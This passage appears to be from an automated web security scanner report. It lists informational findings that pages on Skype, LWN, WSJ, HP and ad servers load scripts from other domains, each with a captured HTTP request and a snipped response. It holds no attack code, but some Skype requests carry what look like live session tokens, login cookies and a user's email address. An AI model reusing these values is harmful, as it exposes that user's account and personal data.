Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:28 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 42065
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.345. https://login.skype.com/account/password-token-sent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-token-sent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/password-token-sent?mode=&email=h02332%40gmail.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 20:59:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:41 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 41059
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.346. https://login.skype.com/account/signup-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/signup-form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:54 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 119699
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</div>

<script src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Lc9KQwAAAAAAK2Egvu8-_F_tR161wkdIlRslemS"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.347. https://login.skype.com/go/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:25 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.348. https://login.skype.com/go/shop.accessories.headsets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.headsets

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:27 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.349. https://login.skype.com/go/shop.accessories.phones  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.phones

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:06 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.350. https://login.skype.com/go/shop.accessories.webcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.webcams

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.351. https://login.skype.com/go/shop.extras  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.extras

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:20 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.352. https://login.skype.com/go/skype.manager.setup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/skype.manager.setup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:24 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.353. https://login.skype.com/go/tvwebcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/tvwebcams

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.354. http://lwn.net/Articles/456878/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Articles/456878/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:51 GMT
Server: Apache
Expires: -1
Content-Length: 18541
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.355. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps/pubclick/&XE&muid=21051315103139790868608&&tax23_RefDocLoc=http://www.google.com/search&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2500
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;sz=160x600;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/wallstreetoasis.com
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;abr=!ie;sz=160x600;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/wallstreetoasis.com/ROS/L23/1747216000/Right/Martini/hertz_goldplusrewar_080111_387/hertz_bt_160x600.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A//www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000?;ord=1747216000?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.356. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2486"></script>
...[SNIP]...
</iframe-->
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
<div id="ctl00_pnlScript">
   
<script language="javascript" type="text/javascript" src="http://www.fins.com/Finance/JScripts/FINS_Widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...

18.357. http://s1.lqcdn.com/m.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.lqcdn.com
Path:   /m.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m.min.js?dt=2.3.110104.1 HTTP/1.1
Host: s1.lqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/banners/aspallframe.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: qTH3OfFD2HT+v40z5qEF/QeVL5KkA8shkvZgYVVtzHMW0VDCQHMkAFLeh7n/ld/a
x-amz-request-id: D7F3884817AD6EE9
Date: Fri, 22 Jul 2011 14:09:22 GMT
x-amz-meta-cb-modifiedtime: Fri, 22 Jul 2011 13:53:31 GMT
Last-Modified: Fri, 22 Jul 2011 13:57:35 GMT
ETag: "85e6a162e87458b7a7e3fddc815a77b2"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 17830
Server: AmazonS3
Age: 37327
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 4721b2c2541305a5abe816e268750610f7a7f93babd7ffb49462d113c7a257558b9c81bc01f54218
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 415dc6f864ab0f88c92436e56f4ceea6.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

if(LqmAds===undefined){var LqmAds={GetQueryTerms:function(){var d=[{d:"www.google.",q:"q="},{d:"www.bing.com",q:"q="},{d:"search.live.com",q:"q="},{d:"search.yahoo.com",q:"p="},{d:"codeproject.com",q:
...[SNIP]...
</iframe>';return this.ReplacePlaceholders(b,a)},BuildJavaScriptTag:function(a){var b='<script language="JavaScript" src="http://ad.doubleclick.net/adj/{sitename}/{zonename};{searchterm}sz={format};{type}tile={tile};ord={timestamp}?" type="text/javascript"></script>
...[SNIP]...

18.358. http://search.hp.com/query.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.hp.com
Path:   /query.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html HTTP/1.1
Host: search.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Ultraseek/5.7.6
Cache-control: public
Expires: Sun, 11 Sep 2011 16:19:41 GMT
Date: Sun, 04 Sep 2011 16:19:41 GMT
Content-type: text/html; charset=utf-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Search HP US - Search results for 'xss'</title>
<link rel="sh
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
</script>

<script src="http://welcome.hp-ww.com/cma/segment/ww/search/metricsSearch.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
</script>
<script src="http://welcome.hp-ww.com/cma/segment/ww/search/metricsSearch.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...

18.359. http://shop.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<t
...[SNIP]...
<link rel="stylesheet" href="/i/css/sidebar_alt.css" type="text/css" media="screen"/>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.360. http://shop.skype.com/apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: shop.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Content-Length: 124501
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
